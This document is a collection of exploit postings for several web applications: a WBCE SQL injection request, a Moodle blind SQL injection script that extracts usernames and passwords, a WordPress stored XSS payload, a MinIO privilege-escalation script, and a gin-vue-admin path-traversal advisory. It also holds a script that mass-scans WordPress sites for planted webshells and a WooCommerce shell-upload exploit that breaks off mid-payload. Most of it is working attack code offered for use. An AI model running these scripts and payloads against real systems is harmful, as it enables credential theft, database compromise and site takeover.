WBCE version 1.6.0 suffers from a remote SQL injection vulnerability.

# Exploit Title: |Unauthenticated SQL injection in WBCE 1.6.0  
# Date: 15.11.2023   
# Exploit Author: young pope   
# Vendor Homepage: https://github.com/WBCE/WBCE_CMS   
# Software Link: https://github.com/WBCE/WBCE_CMS/archive/refs/tags/1.6.0.zip   
# Version: 1.6.0   
# Tested on: Kali linux   
# CVE : CVE-2023-39796

There is an sql injection vulnerability in *miniform* module which is a   
default module installed in the *WBCE* cms. It is an unauthenticated   
sqli so anyone could access it and takeover the whole database.

In file /modules/miniform/ajax_delete_message.php there is no   
authentication check. On line |40| in this file, there is a |DELETE|   
query that is vulnerable, an attacker could jump from the query using   
tick sign - ```.

Function |addslashes()|   
(https://www.php.net/manual/en/function.addslashes.php) escapes only   
these characters and not a tick sign:

  * single quote (')  
  * double quote (")  
  * backslash ()  
  * NUL (the NUL byte

The DB_RECORD_TABLE parameter is vulnerable.

If an unauthenticated attacker send this request:

```

POST /modules/miniform/ajax_delete_message.php HTTP/1.1  
Host: localhost  
User-Agent: Mozilla/5.0 (X11; OpenBSD i386) AppleWebKit/537.36 (KHTML,   
like Gecko) Chrome/36.0.1985.125 Safari/537.36  
Connection: close  
Content-Length: 162  
Accept: */*  
Accept-Language: en  
Content-Type: application/x-www-form-urlencoded  
Accept-Encoding: gzip, deflate

action=delete&DB_RECORD_TABLE=miniform_data`+WHERE+1%3d1+AND+(SELECT+1+FROM+(SELECT(SLEEP(6)))a)--+&iRecordID=1&DB_COLUMN=message_id&MODULE=&purpose=delete_record

```

The response is received after 6s.

Reference links:

  * https://nvd.nist.gov/vuln/detail/CVE-2023-39796  
  * https://forum.wbce.org/viewtopic.php?pid=42046#p42046  
  * https://github.com/WBCE/WBCE_CMS/releases/tag/1.6.1  
  * https://pastebin.com/PBw5AvGp

WBCE 1.6.0 SQL Injection

Moodle version 3.10.1 suffers from a remote time-based SQL injection vulnerability.

    # Exploit Title: Moodle Authenticated Time-Based Blind SQL Injection - "sort" Parameter# Google Dork: # Date: 04/11/2023# Exploit Author: Julio Ángel Ferrari (Aka. T0X1Cx)# Vendor Homepage: https://moodle.org/# Software Link: # Version: 3.10.1# Tested on: Linux# CVE : CVE-2021-36393import requestsimport stringfrom termcolor import colored# Request detailsURL = "http://127.0.0.1:8080/moodle/lib/ajax/service.php?sesskey=ZT0E6J0xWe&info=core_course_get_enrolled_courses_by_timeline_classification"HEADERS = {    "Accept": "application/json, text/javascript, */*; q=0.01",    "Content-Type": "application/json",    "X-Requested-With": "XMLHttpRequest",    "User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/114.0.5735.91 Safari/537.36",    "Origin": "http://127.0.0.1:8080",    "Referer": "http://127.0.0.1:8080/moodle/my/",    "Accept-Encoding": "gzip, deflate",    "Accept-Language": "en-US,en;q=0.9",    "Cookie": "MoodleSession=5b1rk2pfdpbcq2i5hmmern1os0",    "Connection": "close"}# Characters to testcharacters_to_test = string.ascii_lowercase + string.ascii_uppercase + string.digits + "!@#$^&*()-_=+[]{}|;:'\",.<>?/"def test_character(payload):    response = requests.post(URL, headers=HEADERS, json=[payload])    return response.elapsed.total_seconds() >= 3def extract_value(column, label):    base_payload = {        "index": 0,        "methodname": "core_course_get_enrolled_courses_by_timeline_classification",        "args": {            "offset": 0,            "limit": 0,            "classification": "all",            "sort": "",            "customfieldname": "",            "customfieldvalue": ""        }    }    result = ""    for _ in range(50):  # Assumes a maximum of 50 characters for the value        character_found = False        for character in characters_to_test:            if column == "database()":                base_payload["args"]["sort"] = f"fullname OR (database()) LIKE '{result + character}%' AND SLEEP(3)"            else:                base_payload["args"]["sort"] = f"fullname OR (SELECT {column} FROM mdl_user LIMIT 1 OFFSET 0) LIKE '{result + character}%' AND SLEEP(3)"                        if test_character(base_payload):                result += character                print(colored(f"{label}: {result}", 'red'), end="\r")                character_found = True                break        if not character_found:            break    # Print the final result    print(colored(f"{label}: {result}", 'red'))if __name__ == "__main__":    extract_value("database()", "Database")    extract_value("username", "Username")    extract_value("password", "Password")

Moodle 3.10.1 SQL Injection

WordPress Playlist for Youtube plugin version 1.32 suffers from a persistent cross site scripting vulnerability.

    # Exploit Title: Wordpress Plugin Playlist for Youtube - Stored Cross-Site Scripting (XSS)# Date: 22 March 2024# Exploit Author: Erdemstar# Vendor: https://wordpress.com/# Version: 1.32# Proof Of Concept:1. Click Add a new playlist and enter the XSS payload as below into the properties named "Name" or "Playlist ID".# PoC Video: https://www.youtube.com/watch?v=jrH5OHBoTns# Vulnerable Properties name: name, playlist_id# Payload: "><script>alert(document.cookie)</script># Request:POST /wp-admin/admin.php?page=playlists_yt_free HTTP/2Host: erdemstar.localCookie: thc_time=1713843219; booking_package_accountKey=2; wordpress_sec_dd86dc85a236e19160e96f4ec4b56b38=admin%7C1714079650%7CIdP5sIMFkCzSNzY8WFwU5GZFQVLOYP1JZXK77xpoW5R%7C27abdae5aa28462227b32b474b90f0e01fa4751d5c543b281c2348b60f078d2f; wp-settings-time-4=1711124335; cld_2=like; _hjSessionUser_3568329=eyJpZCI6ImY4MWE3NjljLWViN2MtNWM5MS05MzEyLTQ4MGRlZTc4Njc5OSIsImNyZWF0ZWQiOjE3MTEzOTM1MjQ2NDYsImV4aXN0aW5nIjp0cnVlfQ==; wp-settings-time-1=1712096748; wp-settings-1=mfold%3Do%26libraryContent%3Dbrowse%26uploader%3D1%26Categories_tab%3Dpop%26urlbutton%3Dfile%26editor%3Dtinymce%26unfold%3D1; wordpress_test_cookie=WP%20Cookie%20check; wp_lang=en_US; wordpress_logged_in_dd86dc85a236e19160e96f4ec4b56b38=admin%7C1714079650%7CIdP5sIMFkCzSNzY8WFwU5GZFQVLOYP1JZXK77xpoW5R%7Cc64c696fd4114dba180dc6974e102cc02dc9ab8d37482e5c4e86c8e84a1f74f9Content-Length: 178Cache-Control: max-age=0Sec-Ch-Ua: "Not(A:Brand";v="24", "Chromium";v="122"Sec-Ch-Ua-Mobile: ?0Sec-Ch-Ua-Platform: "macOS"Upgrade-Insecure-Requests: 1Origin: https://erdemstar.localContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/122.0.6261.112 Safari/537.36Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Sec-Fetch-Site: same-originSec-Fetch-Mode: navigateSec-Fetch-User: ?1Sec-Fetch-Dest: documentReferer: https://erdemstar.local/wp-admin/admin.php?page=playlists_yt_freeAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Priority: u=0, i_wpnonce=17357e6139&_wp_http_referer=%2Fwp-admin%2Fadmin.php%3Fpage%3Dplaylists_yt_free&name="><script>alert(document.cookie)</script>&playlist_id=123&template=1&text_size=123&text_color=%23000000

WordPress Playlist For Youtube 1.32 Cross Site Scripting

MinIO versions prior to 2024-01-31T20-20-33Z suffer from a privilege escalation vulnerability.

    # Exploit Title: MinIO < 2024-01-31T20-20-33Z -  Privilege Escalation# Date: 2024-04-11# Exploit Author: Jenson Zhao# Vendor Homepage: https://min.io/# Software Link: https://github.com/minio/minio/# Version: Up to (excluding) RELEASE.2024-01-31T20-20-33Z# Tested on: Windows 10# CVE : CVE-2024-24747# Required before execution: pip install minio,requestsimport argparseimport datetimeimport tracebackimport urllibfrom xml.dom.minidom import parseStringimport requestsimport jsonimport base64from minio.credentials import Credentialsfrom minio.signer import sign_v4_s3class CVE_2024_24747:    new_buckets = []    old_buckets = []    def __init__(self, host, port, console_port, accesskey, secretkey, verify=False):        self.bucket_names = ['pocpublic', 'pocprivate']        self.new_accesskey = 'miniocvepoc'        self.new_secretkey = 'MINIOcvePOC'        self.headers = {          'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/123.0.0.0 Safari/537.36',          'Content-Type': 'application/json',          'Accept': '*/*'        }        self.accesskey = accesskey        self.secretkey = secretkey        self.verify = verify        if verify:            self.url = "https://" + host + ":" + port            self.console_url = "https://" + host + ":" + console_port        else:            self.url = "http://" + host + ":" + port            self.console_url = "http://" + host + ":" + console_port        self.credits = Credentials(            access_key=self.new_accesskey,            secret_key=self.new_secretkey        )        self.login()        try:            self.create_buckets()            self.create_accesskey()            self.old_buckets = self.console_ls()            self.console_exp()            self.new_buckets = self.console_ls()        except:            traceback.print_stack()        finally:            self.delete_accesskey()            self.delete_buckets()            if len(self.new_buckets) > len(self.old_buckets):                print("There is CVE-2024-24747 problem with the minio!")                print("Before the exploit, the buckets are : " + str(self.old_buckets))                print("After the exploit, the buckets are : " + str(self.new_buckets))            else:                print("There is no CVE-2024-24747 problem with the minio!")    def login(self):        url = self.url + "/api/v1/login"        payload = json.dumps({          "accessKey": self.accesskey,          "secretKey": self.secretkey        })        self.session = requests.session()        if self.verify:            self.session.verify = False        status_code = self.session.request("POST", url, headers=self.headers, data=payload).status_code        # print(status_code)        if status_code == 204:            status_code = 0        else:            print('Login failed! Please check if the input accesskey and secretkey are correct!')            exit(1)    def create_buckets(self):        url = self.url + "/api/v1/buckets"        for name in self.bucket_names:            payload = json.dumps({                "name": name,                "versioning": False,                "locking": False            })            status_code = self.session.request("POST", url, headers=self.headers, data=payload).status_code            # print(status_code)            if status_code == 200:                status_code = 0            else:                print("新建 (New)"+name+" bucket 失败 (fail)！")    def delete_buckets(self):        for name in self.bucket_names:            url = self.url + "/api/v1/buckets/" + name            status_code = self.session.request("DELETE", url, headers=self.headers).status_code            # print(status_code)            if status_code == 204:                status_code = 0            else:                print("删除 (delete)"+name+" bucket 失败 (fail)！")    def create_accesskey(self):        url = self.url + "/api/v1/service-account-credentials"        payload = json.dumps({            "policy": "{              \n    \"Version\":\"2012-10-17\",              \n    \"Statement\":[              \n        {              \n            \"Effect\":\"Allow\",              \n            \"Action\":[              \n                \"s3:*\"              \n            ],              \n            \"Resource\":[              \n                \"arn:aws:s3:::pocpublic\",              \n                \"arn:aws:s3:::pocpublic/*\"              \n            ]              \n        }              \n    ]              \n}",            "accessKey": self.new_accesskey,            "secretKey": self.new_secretkey        })        status_code = self.session.request("POST", url, headers=self.headers, data=payload).status_code        # print(status_code)        if status_code == 201:            # print("新建 (New)" + self.new_accesskey + " accessKey 成功 (success)！")            # print(self.new_secretkey)            status_code = 0        else:            print("新建 (New)" + self.new_accesskey + " accessKey 失败 (fail)！")    def delete_accesskey(self):        url = self.url + "/api/v1/service-accounts/" + base64.b64encode(self.new_accesskey.encode("utf-8")).decode('utf-8')        status_code = self.session.request("DELETE", url, headers=self.headers).status_code        # print(status_code)        if status_code == 204:            # print("删除" + self.new_accesskey + " accessKey成功！")            status_code = 0        else:            print("删除 (delete)" + self.new_accesskey + " accessKey 失败 (fail)！")    def headers_gen(self,url,sha256,method):        datetimes = datetime.datetime.utcnow()        datetime_str = datetimes.strftime('%Y%m%dT%H%M%SZ')        urls = urllib.parse.urlparse(url)        headers = {            'X-Amz-Content-Sha256': sha256,            'X-Amz-Date': datetime_str,            'Host': urls.netloc,        }        headers = sign_v4_s3(            method=method,            url=urls,            region='us-east-1',            headers=headers,            credentials=self.credits,            content_sha256=sha256,            date=datetimes,        )        return headers    def console_ls(self):        url = self.console_url + "/"        sha256 = "e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855"        headers = self.headers_gen(url,sha256,'GET')        if self.verify:            response = requests.get(url,headers=headers,verify=False)        else:            response = requests.get(url, headers=headers)        DOMTree = parseString(response.text)        collection = DOMTree.documentElement        buckets = collection.getElementsByTagName("Bucket")        bucket_names = []        for bucket in buckets:            bucket_names.append(bucket.getElementsByTagName("Name")[0].childNodes[0].data)        # print('当前可查看的bucket有:\n' + str(bucket_names))        return bucket_names    def console_exp(self):        url = self.console_url + "/minio/admin/v3/update-service-account?accessKey=" + self.new_accesskey        sha256 = "0f87fd59dff29507f82e189d4f493206ea7f370d0ce97b9cc8c1b7a4e609ec95"        headers = self.headers_gen(url, sha256, 'POST')        hex_string = "e1fd1c29bed167d5cf4986d3f224db2994b4942291dbd443399f249b84c79d9f00b9e0c0c7eed623a8621dee64713a3c8c63e9966ab62fcd982336"        content = bytes.fromhex(hex_string)        if self.verify:            response = requests.post(url,headers=headers,data=content,verify=False)        else:            response = requests.post(url,headers=headers,data=content)        status_code = response.status_code        if status_code == 204:            # print("提升" + self.new_accesskey + " 权限成功！")            status_code = 0        else:            print("提升 (promote)" + self.new_accesskey + " 权限失败 (Permission failed)！")if __name__ == '__main__':    logo = """                            ____    ___   ____   _  _           ____   _  _    _____  _  _    _____   ___ __   __  ___        |___ \  / _ \ |___ \ | || |         |___ \ | || |  |___  || || |  |___  | / __|\ \ / / / _ \ _____   __) || | | |  __) || || |_  _____   __) || || |_    / / | || |_    / / | (__  \ V / |  __/|_____| / __/ | |_| | / __/ |__   _||_____| / __/ |__   _|  / /  |__   _|  / /   \___|  \_/   \___|       |_____| \___/ |_____|   |_|         |_____|   |_|   /_/      |_|   /_/                               """    print(logo)    parser = argparse.ArgumentParser()    parser.add_argument("-H", "--host", required=True, help="Host of the target. example: 127.0.0.1")    parser.add_argument("-a", "--accesskey", required=True, help="Minio AccessKey of the target. example: minioadmin")    parser.add_argument("-s", "--secretkey", required=True, help="Minio SecretKey of the target. example: minioadmin")    parser.add_argument("-c", "--console_port", required=True, help="Minio console port of the target. example: 9000")    parser.add_argument("-p", "--port", required=True, help="Minio port of the target. example: 9090")    parser.add_argument("--https", action='store_true', help="Is MinIO accessed through HTTPS.")    args = parser.parse_args()    CVE_2024_24747(args.host,args.port,args.console_port,args.accesskey,args.secretkey,args.https)

MinIO Privilege Escalation

### Impact
"gin-vue-admin<=v2.6.1 has a code injection vulnerability in the backend. In the Plugin System -> Plugin Template feature, an attacker can perform directory traversal by manipulating the 'plugName' parameter. They can create specific folders such as 'api', 'config', 'global', 'model', 'router', 'service', and 'main.go' function within the specified traversal directory. Moreover, the Go files within these folders can have arbitrary code inserted based on a specific PoC parameter."

Affected code: https://github.com/flipped-aurora/gin-vue-admin/blob/746af378990ebf3367f8bb3d4e9684936df152e7/server/api/v1/system/sys_auto_code.go:239. Let's take a look at the method 'AutoPlug' within the 'AutoCodeApi' struct.
```go
func (autoApi *AutoCodeApi) AutoPlug(c *gin.Context) {
	var a system.AutoPlugReq
	err := c.ShouldBindJSON(&a)
	if err != nil {
		response.FailWithMessage(err.Error(), c)
		return
	}
	a.Snake = strings.ToLower(a.PlugName)
	a.NeedModel = a.HasRequest || a.HasResponse
	err = autoCodeService.CreatePlug(a)
	if err != nil {
		global.GVA_LOG.Error("预览失败!", zap.Error(err))
		response.FailWithMessage("预览失败", c)
		return
	}
	response.Ok(c)
}
```
The main reason for the existence of this vulnerability is the controllability of the PlugName field within the struct.
```go
type AutoPlugReq struct {
	PlugName    string         `json:"plugName"` // 必然大写开头
	Snake       string         `json:"snake"`    // 后端自动转为 snake
	RouterGroup string         `json:"routerGroup"`
	HasGlobal   bool           `json:"hasGlobal"`
	HasRequest  bool           `json:"hasRequest"`
	HasResponse bool           `json:"hasResponse"`
	NeedModel   bool           `json:"needModel"`
	Global      []AutoPlugInfo `json:"global,omitempty"`
	Request     []AutoPlugInfo `json:"request,omitempty"`
	Response    []AutoPlugInfo `json:"response,omitempty"`
}
```
POC：
```
POST /api/autoCode/createPlug HTTP/1.1
Host: 192.168.31.18:8080
Content-Length: 326
Accept: application/json, text/plain, */*
x-token: eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJVVUlEIjoiNzJlZWQ4OTUtYzUwOC00MDFiLWIyYzQtMTk2MWMyOTlkOWNhIiwiSUQiOjEsIlVzZXJuYW1lIjoiYWRtaW4iLCJOaWNrTmFtZSI6Ik1yLuWlh-a3vCIsIkF1dGhvcml0eUlkIjo4ODgsIkJ1ZmZlclRpbWUiOjg2NDAwLCJpc3MiOiJxbVBsdXMiLCJhdWQiOlsiR1ZBIl0sImV4cCI6MTcxMjIxMTM4MywibmJmIjoxNzExNjA2NTgzfQ.uq61pJNi4kzUXb8lEkVa7NBCBvp_Ye59fee-TJV_rpE
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/123.0.0.0 Safari/537.36
x-user-id: 1
Content-Type: application/json
Origin: http://192.168.31.18:8080
Referer: http://192.168.31.18:8080/
Accept-Encoding: gzip, deflate, br
Accept-Language: zh-CN,zh;q=0.9,en-US;q=0.8,en;q=0.7,ja;q=0.6
Cookie: x-token=eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJVVUlEIjoiNzJlZWQ4OTUtYzUwOC00MDFiLWIyYzQtMTk2MWMyOTlkOWNhIiwiSUQiOjEsIlVzZXJuYW1lIjoiYWRtaW4iLCJOaWNrTmFtZSI6Ik1yLuWlh-a3vCIsIkF1dGhvcml0eUlkIjo4ODgsIkJ1ZmZlclRpbWUiOjg2NDAwLCJpc3MiOiJxbVBsdXMiLCJhdWQiOlsiR1ZBIl0sImV4cCI6MTcxMjIyMDA4NiwibmJmIjoxNzExNjE1Mjg2fQ.XVV97Ky17E9pUO_byVgK--FnAp9ye4Tpab2jnma6dBU
Connection: close

{"plugName":"../../../server/","routerGroup":"111"	,"hasGlobal":true,"hasRequest":false,"hasResponse":false,"global":[{"key":"1","type":"1","desc":"1"},{"key":"type","value":"faspohgoahgioahgioahgioashogia","desc":"1","type":"string"}],"request":[{"key":"","type":"","desc":""}],"response":[{"key":"","type":"","desc":""}]}
```
By performing directory traversal and creating directories such as api, config, global, model, router, and service within the gin-vue-admin/server directory, an attacker can tamper with the source code and the main.go file. They can potentially overwrite or tamper with the Go source code files located in the directory C:\代码审计\server to further compromise the system.
![image](https://github.com/flipped-aurora/gin-vue-admin/assets/142187061/c2cad65a-6401-41c2-ba0d-6eb5e3760516)
![image](https://github.com/flipped-aurora/gin-vue-admin/assets/142187061/681ca156-c125-4a9f-9443-825a34a89b2d)
![image](https://github.com/flipped-aurora/gin-vue-admin/assets/142187061/6870ce90-8166-48c7-a02c-29c4429283d4)


### Patches
Please wait for the latest patch

### Workarounds
You can use the following filtering methods to rectify the directory traversal problem
if strings.Index(plugPath, "..") > -1 {
        fmt.Println("no bypass",plugPath)
    }
### References
https://github.com/flipped-aurora/gin-vue-admin


**Impact**

"gin-vue-admin<=v2.6.1 has a code injection vulnerability in the backend. In the Plugin System -> Plugin Template feature, an attacker can perform directory traversal by manipulating the 'plugName' parameter. They can create specific folders such as 'api', 'config', 'global', 'model', 'router', 'service', and 'main.go' function within the specified traversal directory. Moreover, the Go files within these folders can have arbitrary code inserted based on a specific PoC parameter."

Affected code: https://github.com/flipped-aurora/gin-vue-admin/blob/746af378990ebf3367f8bb3d4e9684936df152e7/server/api/v1/system/sys\_auto\_code.go:239. Let's take a look at the method 'AutoPlug' within the 'AutoCodeApi' struct.

func (autoApi \*AutoCodeApi) AutoPlug(c \*gin.Context) {
	var a system.AutoPlugReq
	err := c.ShouldBindJSON(&a)
	if err != nil {
		response.FailWithMessage(err.Error(), c)
		return
	}
	a.Snake \= strings.ToLower(a.PlugName)
	a.NeedModel \= a.HasRequest || a.HasResponse
	err \= autoCodeService.CreatePlug(a)
	if err != nil {
		global.GVA\_LOG.Error("预览失败!", zap.Error(err))
		response.FailWithMessage("预览失败", c)
		return
	}
	response.Ok(c)
}

The main reason for the existence of this vulnerability is the controllability of the PlugName field within the struct.

type AutoPlugReq struct {
	PlugName    string         \`json:"plugName"\` // 必然大写开头
	Snake       string         \`json:"snake"\`    // 后端自动转为 snake
	RouterGroup string         \`json:"routerGroup"\`
	HasGlobal   bool           \`json:"hasGlobal"\`
	HasRequest  bool           \`json:"hasRequest"\`
	HasResponse bool           \`json:"hasResponse"\`
	NeedModel   bool           \`json:"needModel"\`
	Global      \[\]AutoPlugInfo \`json:"global,omitempty"\`
	Request     \[\]AutoPlugInfo \`json:"request,omitempty"\`
	Response    \[\]AutoPlugInfo \`json:"response,omitempty"\`
}

POC：

    POST /api/autoCode/createPlug HTTP/1.1
    Host: 192.168.31.18:8080
    Content-Length: 326
    Accept: application/json, text/plain, */*
    x-token: eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJVVUlEIjoiNzJlZWQ4OTUtYzUwOC00MDFiLWIyYzQtMTk2MWMyOTlkOWNhIiwiSUQiOjEsIlVzZXJuYW1lIjoiYWRtaW4iLCJOaWNrTmFtZSI6Ik1yLuWlh-a3vCIsIkF1dGhvcml0eUlkIjo4ODgsIkJ1ZmZlclRpbWUiOjg2NDAwLCJpc3MiOiJxbVBsdXMiLCJhdWQiOlsiR1ZBIl0sImV4cCI6MTcxMjIxMTM4MywibmJmIjoxNzExNjA2NTgzfQ.uq61pJNi4kzUXb8lEkVa7NBCBvp_Ye59fee-TJV_rpE
    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/123.0.0.0 Safari/537.36
    x-user-id: 1
    Content-Type: application/json
    Origin: http://192.168.31.18:8080
    Referer: http://192.168.31.18:8080/
    Accept-Encoding: gzip, deflate, br
    Accept-Language: zh-CN,zh;q=0.9,en-US;q=0.8,en;q=0.7,ja;q=0.6
    Cookie: x-token=eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJVVUlEIjoiNzJlZWQ4OTUtYzUwOC00MDFiLWIyYzQtMTk2MWMyOTlkOWNhIiwiSUQiOjEsIlVzZXJuYW1lIjoiYWRtaW4iLCJOaWNrTmFtZSI6Ik1yLuWlh-a3vCIsIkF1dGhvcml0eUlkIjo4ODgsIkJ1ZmZlclRpbWUiOjg2NDAwLCJpc3MiOiJxbVBsdXMiLCJhdWQiOlsiR1ZBIl0sImV4cCI6MTcxMjIyMDA4NiwibmJmIjoxNzExNjE1Mjg2fQ.XVV97Ky17E9pUO_byVgK--FnAp9ye4Tpab2jnma6dBU
    Connection: close
    
    {"plugName":"../../../server/","routerGroup":"111"	,"hasGlobal":true,"hasRequest":false,"hasResponse":false,"global":[{"key":"1","type":"1","desc":"1"},{"key":"type","value":"faspohgoahgioahgioahgioashogia","desc":"1","type":"string"}],"request":[{"key":"","type":"","desc":""}],"response":[{"key":"","type":"","desc":""}]}
    

By performing directory traversal and creating directories such as api, config, global, model, router, and service within the gin-vue-admin/server directory, an attacker can tamper with the source code and the main.go file. They can potentially overwrite or tamper with the Go source code files located in the directory C:\\代码审计\\server to further compromise the system.  
  
  

**Patches**

Please wait for the latest patch

**Workarounds**

You can use the following filtering methods to rectify the directory traversal problem  
if strings.Index(plugPath, "..") > -1 {  
        fmt.Println("no bypass",plugPath)  
    }

**References**

https://github.com/flipped-aurora/gin-vue-admin

**References**

*   GHSA-gv3w-m57p-3wc4
*   flipped-aurora/gin-vue-admin@b1b7427
*   https://github.com/flipped-aurora/gin-vue-admin/blob/746af378990ebf3367f8bb3d4e9684936df152e7/server/api/v1/system/sys\_auto\_code.go:239

GHSA-gv3w-m57p-3wc4: gin-vue-admin background arbitrary code coverage vulnerability

WordPress Travelscape theme version 1.0.3 suffers from an arbitrary file upload vulnerability.

    # Exploit Title: Wordpress Theme Travelscape v1.0.3 - Arbitrary File Upload# Date: 2024-04-01# Author: Milad Karimi (Ex3ptionaL)# Category : webapps# Tested on: windows 10 , firefoximport sysimport os.pathimport requestsimport reimport urllib3from requests.exceptions import SSLErrorfrom multiprocessing.dummy import Pool as ThreadPoolfrom colorama import Fore, initinit(autoreset=True)error_color = Fore.REDinfo_color = Fore.CYANsuccess_color = Fore.GREENhighlight_color = Fore.MAGENTArequests.urllib3.disable_warnings()headers = {    'Connection': 'keep-alive',    'Cache-Control': 'max-age=0',    'Upgrade-Insecure-Requests': '1',    'User-Agent': 'Mozilla/5.0 (Linux; Android 7.0; SM-G892A Build/NRD90M;wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107Mobile Safari/537.36',    'Accept':'text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8',    'Accept-Encoding': 'gzip, deflate',    'Accept-Language': 'en-US,en;q=0.9,fr;q=0.8',    'Referer': 'www.google.com'}def URLdomain(url):    if url.startswith("http://"):        url = url.replace("http://", "")    elif url.startswith("https://"):        url = url.replace("https://", "")    if '/' in url:        url = url.split('/')[0]    return urldef check_security(url):    fg = success_color    fr = error_color    try:        url = 'http://' + URLdomain(url)        check = requests.get(url +'/wp-content/themes/travelscape/json.php', headers=headers,allow_redirects=True, timeout=15)        if 'MSQ_403' in check.text:            print(' -| ' + url + ' --> {}[Successfully]'.format(fg))            open('MSQ_403.txt', 'a').write(url +'/wp-content/themes/travelscape/json.php\n')        else:            url = 'https://' + URLdomain(url)            check = requests.get(url +'/wp-content/themes/aahana/json.php', headers=headers,allow_redirects=True, verify=False, timeout=15)            if 'MSQ_403' in check.text:                print(' -| ' + url + ' --> {}[Successfully]'.format(fg))                open('MSQ_403.txt', 'a').write(url +'/wp-content/themes/aahana/json.php\n')            else:                print(' -| ' + url + ' --> {}[Failed]'.format(fr))        check = requests.get(url + '/wp-content/themes/travel/issue.php',headers=headers, allow_redirects=True, timeout=15)        if 'Yanz Webshell!' in check.text:            print(' -| ' + url + ' --> {}[Successfully]'.format(fg))            open('wso.txt', 'a').write(url +'/wp-content/themes/travel/issue.php\n')        else:            url = 'https://' + URLdomain(url)        check = requests.get(url + '/about.php', headers=headers,allow_redirects=True, timeout=15)        if 'Yanz Webshell!' in check.text:            print(' -| ' + url + ' --> {}[Successfully]'.format(fg))            open('wso.txt', 'a').write(url + '/about.php\n')        else:            url = 'https://' + URLdomain(url)        check = requests.get(url +'/wp-content/themes/digital-download/new.php', headers=headers,allow_redirects=True, timeout=15)        if '#0x2525' in check.text:            print(' -| ' + url + ' --> {}[Successfully]'.format(fg))            open('digital-download.txt', 'a').write(url +'/wp-content/themes/digital-download/new.php\n')        else:            print(' -| ' + url + ' --> {}[Failed]'.format(fr))            url = 'http://' + URLdomain(url)        check = requests.get(url + '/epinyins.php', headers=headers,allow_redirects=True, timeout=15)        if 'Uname:' in check.text:            print(' -| ' + url + ' --> {}[Successfully]'.format(fg))            open('wso.txt', 'a').write(url + '/epinyins.php\n')        else:            print(' -| ' + url + ' --> {}[Failed]'.format(fr))            url = 'https://' + URLdomain(url)        check = requests.get(url + '/wp-admin/dropdown.php',headers=headers, allow_redirects=True, verify=False, timeout=15)        if 'Uname:' in check.text:            print(' -| ' + url + ' --> {}[Successfully]'.format(fg))            open('wso.txt', 'a').write(url + '/wp-admin/dropdown.php\n')        else:            url = 'https://' + URLdomain(url)            check = requests.get(url +'/wp-content/plugins/dummyyummy/wp-signup.php', headers=headers,allow_redirects=True, verify=False, timeout=15)            if 'Simple Shell' in check.text:                print(' -| ' + url + ' --> {}[Successfully]'.format(fg))                open('dummyyummy.txt', 'a').write(url +'/wp-content/plugins/dummyyummy/wp-signup.php\n')            else:                print(' -| ' + url + ' --> {}[Failed]'.format(fr))    except Exception as e:        print(f' -| {url} --> {fr}[Failed] due to: {e}')def main():    try:        url_file_path = sys.argv[1]    except IndexError:        url_file_path = input(f"{info_color}Enter the path to the filecontaining URLs: ")        if not os.path.isfile(url_file_path):            print(f"{error_color}[ERROR] The specified file path isinvalid.")            sys.exit(1)    try:        urls_to_check = [line.strip() for line in open(url_file_path, 'r',encoding='utf-8').readlines()]    except Exception as e:        print(f"{error_color}[ERROR] An error occurred while reading thefile: {e}")        sys.exit(1)    pool = ThreadPool(20)    pool.map(check_security, urls_to_check)    pool.close()    pool.join()    print(f"{info_color}Security check process completed successfully.Results are saved in corresponding files.")if __name__ == "__main__":    main()

WordPress Travelscape Theme 1.0.3 Arbitrary File Upload

WordPress Membership for WooCommerce plugin versions prior to 2.1.7 suffer from a remote shell upload vulnerability.

    # Exploit Title: Wordpress Plugin - Membership For WooCommerce < v2.1.7 - Arbitrary File Upload to Shell (Unauthenticated)# Date: 2024-02-25# Author: Milad Karimi (Ex3ptionaL)# Category : webapps# Tested on: windows 10 , firefoximport sys , requests, re , jsonfrom multiprocessing.dummy import Poolfrom colorama import Forefrom colorama import initinit(autoreset=True)headers = {'Connection': 'keep-alive', 'Cache-Control': 'max-age=0','Upgrade-Insecure-Requests': '1', 'User-Agent': 'Mozlila/5.0 (Linux;Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, likeGecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36', 'Accept':'text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8','Accept-Encoding': 'gzip, deflate', 'Accept-Language':'en-US,en;q=0.9,fr;q=0.8', 'referer': 'www.google.com'}uploader = """GIF89a<?php ?><!DOCTYPE html><html><head>  <title>Resultz</title></head><body><h1>Uploader</h1>  <form enctype='multipart/form-data' action='' method='POST'>    <p>Uploaded</p>    <input type='file' name='uploaded_file'></input><br />    <input type='submit' value='Upload'></input>  